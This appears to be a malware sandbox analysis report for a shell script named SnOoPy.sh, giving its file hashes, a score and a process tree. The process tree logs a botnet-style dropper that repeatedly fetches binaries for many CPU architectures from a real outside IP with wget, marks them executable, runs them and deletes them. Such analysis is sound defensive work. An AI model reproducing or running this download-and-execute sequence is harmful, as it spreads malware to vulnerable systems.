Overview

overview

10

Static

static

1

script_mal...6c1.sh

ubuntu-20.04-amd64

9

script_malware/1.sh

ubuntu-20.04-amd64

10

script_mal...459.sh

ubuntu-20.04-amd64

7

script_mal...ux.elf

ubuntu-20.04-amd64

1

script_mal...da.elf

ubuntu-20.04-amd64

1

script_malware/23.sh

ubuntu-20.04-amd64

10

script_malware/404

ubuntu-20.04-amd64

script_mal...c5b.py

ubuntu-20.04-amd64

1

script_mal...006.sh

ubuntu-20.04-amd64

10

script_mal...oPy.sh

ubuntu-20.04-amd64

1

script_mal...617.sh

ubuntu-20.04-amd64

script_mal...dc0.sh

ubuntu-20.04-amd64

9

script_mal...e58.sh

ubuntu-20.04-amd64

7

script_mal...d28.sh

ubuntu-20.04-amd64

7

script_mal...ail.sh

ubuntu-20.04-amd64

script_malware/rs.sh

ubuntu-20.04-amd64

6

script_mal...tup.sh

ubuntu-20.04-amd64

7

script_mal...ll.elf

ubuntu-20.04-amd64

1

script_malware/ta.sh

ubuntu-20.04-amd64

10

Resubmissions

15-03-2024 16:07

240315-tkykeacf7z 1

25-02-2024 14:29

240225-rtjrhaee9z 10

Analysis

  • max time kernel
    5s
  • max time network
    1680s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240221-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
  • submitted
    25-02-2024 14:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    script_malware/SnOoPy.sh

  • Size

    2KB

  • MD5

    f0664749e65d26335de79a90c7074d00

  • SHA1

    0deb03914ba232314b5214803dd97b94c1c9d9e5

  • SHA256

    57ad07730428c1412ba43f4470c2074f4f0ef4e6eb5fcd24c9e19e49028e455a

  • SHA512

    b605e84c23dad423a5e585c49957b0ade5f8764681f010fc1d192c81f677e4a849872db8afedd262e740f648aca18649a89420a54a02f1f1bd594c2125c2b6ff

Score
1/10

Malware Config

Signatures

Processes

  • /tmp/script_malware/SnOoPy.sh
    /tmp/script_malware/SnOoPy.sh
    1⤵
      PID:1476
      • /usr/bin/wget
        wget http://185.144.159.137/m-i.p-s.SNOOPY
        2⤵
          PID:1480
        • /usr/bin/chmod
          chmod +x m-i.p-s.SNOOPY
          2⤵
            PID:1481
          • /tmp/m-i.p-s.SNOOPY
            ./m-i.p-s.SNOOPY
            2⤵
              PID:1482
            • /usr/bin/rm
              rm -rf m-i.p-s.SNOOPY
              2⤵
                PID:1483
              • /usr/bin/wget
                wget http://185.144.159.137/m-p.s-l.SNOOPY
                2⤵
                  PID:1484
                • /usr/bin/chmod
                  chmod +x m-p.s-l.SNOOPY
                  2⤵
                    PID:1485
                  • /tmp/m-p.s-l.SNOOPY
                    ./m-p.s-l.SNOOPY
                    2⤵
                      PID:1486
                    • /usr/bin/rm
                      rm -rf m-p.s-l.SNOOPY
                      2⤵
                        PID:1487
                      • /usr/bin/wget
                        wget http://185.144.159.137/s-h.4-.SNOOPY
                        2⤵
                          PID:1488
                        • /usr/bin/chmod
                          chmod +x s-h.4-.SNOOPY
                          2⤵
                            PID:1495
                          • /tmp/s-h.4-.SNOOPY
                            ./s-h.4-.SNOOPY
                            2⤵
                              PID:1496
                            • /usr/bin/rm
                              rm -rf s-h.4-.SNOOPY
                              2⤵
                                PID:1497
                              • /usr/bin/wget
                                wget http://185.144.159.137/x-8.6-.SNOOPY
                                2⤵
                                  PID:1498
                                • /usr/bin/chmod
                                  chmod +x x-8.6-.SNOOPY
                                  2⤵
                                    PID:1516
                                  • /tmp/x-8.6-.SNOOPY
                                    ./x-8.6-.SNOOPY
                                    2⤵
                                      PID:1517
                                    • /usr/bin/rm
                                      rm -rf x-8.6-.SNOOPY
                                      2⤵
                                        PID:1518
                                      • /usr/bin/wget
                                        wget http://185.144.159.137/a-r.m-6.SNOOPY
                                        2⤵
                                          PID:1519
                                        • /usr/bin/chmod
                                          chmod +x a-r.m-6.SNOOPY
                                          2⤵
                                            PID:1533
                                          • /tmp/a-r.m-6.SNOOPY
                                            ./a-r.m-6.SNOOPY
                                            2⤵
                                              PID:1534
                                            • /usr/bin/rm
                                              rm -rf a-r.m-6.SNOOPY
                                              2⤵
                                                PID:1535
                                              • /usr/bin/wget
                                                wget http://185.144.159.137/x-3.2-.SNOOPY
                                                2⤵
                                                  PID:1536
                                                • /usr/bin/chmod
                                                  chmod +x x-3.2-.SNOOPY
                                                  2⤵
                                                    PID:1541
                                                  • /tmp/x-3.2-.SNOOPY
                                                    ./x-3.2-.SNOOPY
                                                    2⤵
                                                      PID:1542
                                                    • /usr/bin/rm
                                                      rm -rf x-3.2-.SNOOPY
                                                      2⤵
                                                        PID:1543
                                                      • /usr/bin/wget
                                                        wget http://185.144.159.137/a-r.m-7.SNOOPY
                                                        2⤵
                                                          PID:1544
                                                        • /usr/bin/chmod
                                                          chmod +x a-r.m-7.SNOOPY
                                                          2⤵
                                                            PID:1559
                                                          • /tmp/a-r.m-7.SNOOPY
                                                            ./a-r.m-7.SNOOPY
                                                            2⤵
                                                              PID:1561
                                                            • /usr/bin/rm
                                                              rm -rf a-r.m-7.SNOOPY
                                                              2⤵
                                                                PID:1562
                                                              • /usr/bin/wget
                                                                wget http://185.144.159.137/p-p.c-.SNOOPY
                                                                2⤵
                                                                  PID:1564
                                                                • /usr/bin/chmod
                                                                  chmod +x p-p.c-.SNOOPY
                                                                  2⤵
                                                                    PID:1606
                                                                  • /tmp/p-p.c-.SNOOPY
                                                                    ./p-p.c-.SNOOPY
                                                                    2⤵
                                                                      PID:1607
                                                                    • /usr/bin/rm
                                                                      rm -rf p-p.c-.SNOOPY
                                                                      2⤵
                                                                        PID:1611
                                                                      • /usr/bin/wget
                                                                        wget http://185.144.159.137/i-5.8-6.SNOOPY
                                                                        2⤵
                                                                          PID:1614
                                                                        • /usr/bin/chmod
                                                                          chmod +x i-5.8-6.SNOOPY
                                                                          2⤵
                                                                            PID:1674
                                                                          • /tmp/i-5.8-6.SNOOPY
                                                                            ./i-5.8-6.SNOOPY
                                                                            2⤵
                                                                              PID:1675
                                                                            • /usr/bin/rm
                                                                              rm -rf i-5.8-6.SNOOPY
                                                                              2⤵
                                                                                PID:1677
                                                                              • /usr/bin/wget
                                                                                wget http://185.144.159.137/m-6.8-k.SNOOPY
                                                                                2⤵
                                                                                  PID:1679
                                                                                • /usr/bin/chmod
                                                                                  chmod +x m-6.8-k.SNOOPY
                                                                                  2⤵
                                                                                    PID:1692
                                                                                  • /tmp/m-6.8-k.SNOOPY
                                                                                    ./m-6.8-k.SNOOPY
                                                                                    2⤵
                                                                                      PID:1694
                                                                                    • /usr/bin/rm
                                                                                      rm -rf m-6.8-k.SNOOPY
                                                                                      2⤵
                                                                                        PID:1695
                                                                                      • /usr/bin/wget
                                                                                        wget http://185.144.159.137/p-p.c-.SNOOPY
                                                                                        2⤵
                                                                                          PID:1696
                                                                                        • /usr/bin/chmod
                                                                                          chmod +x p-p.c-.SNOOPY
                                                                                          2⤵
                                                                                            PID:1711
                                                                                          • /tmp/p-p.c-.SNOOPY
                                                                                            ./p-p.c-.SNOOPY
                                                                                            2⤵
                                                                                              PID:1712
                                                                                            • /usr/bin/rm
                                                                                              rm -rf p-p.c-.SNOOPY
                                                                                              2⤵
                                                                                                PID:1715
                                                                                              • /usr/bin/wget
                                                                                                wget http://185.144.159.137/a-r.m-4.SNOOPY
                                                                                                2⤵
                                                                                                  PID:1718
                                                                                                • /usr/bin/chmod
                                                                                                  chmod +x a-r.m-4.SNOOPY
                                                                                                  2⤵
                                                                                                    PID:1763
                                                                                                  • /tmp/a-r.m-4.SNOOPY
                                                                                                    ./a-r.m-4.SNOOPY
                                                                                                    2⤵
                                                                                                      PID:1767
                                                                                                    • /usr/bin/rm
                                                                                                      rm -rf a-r.m-4.SNOOPY
                                                                                                      2⤵
                                                                                                        PID:1769
                                                                                                      • /usr/bin/wget
                                                                                                        wget http://185.144.159.137/a-r.m-5.SNOOPY
                                                                                                        2⤵
                                                                                                          PID:1772
                                                                                                        • /usr/bin/chmod
                                                                                                          chmod +x a-r.m-5.SNOOPY
                                                                                                          2⤵
                                                                                                            PID:1791
                                                                                                          • /tmp/a-r.m-5.SNOOPY
                                                                                                            ./a-r.m-5.SNOOPY
                                                                                                            2⤵
                                                                                                              PID:1792
                                                                                                            • /usr/bin/rm
                                                                                                              rm -rf a-r.m-5.SNOOPY
                                                                                                              2⤵
                                                                                                                PID:1795

                                                                                                            Network

                                                                                                            MITRE ATT&CK Matrix

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads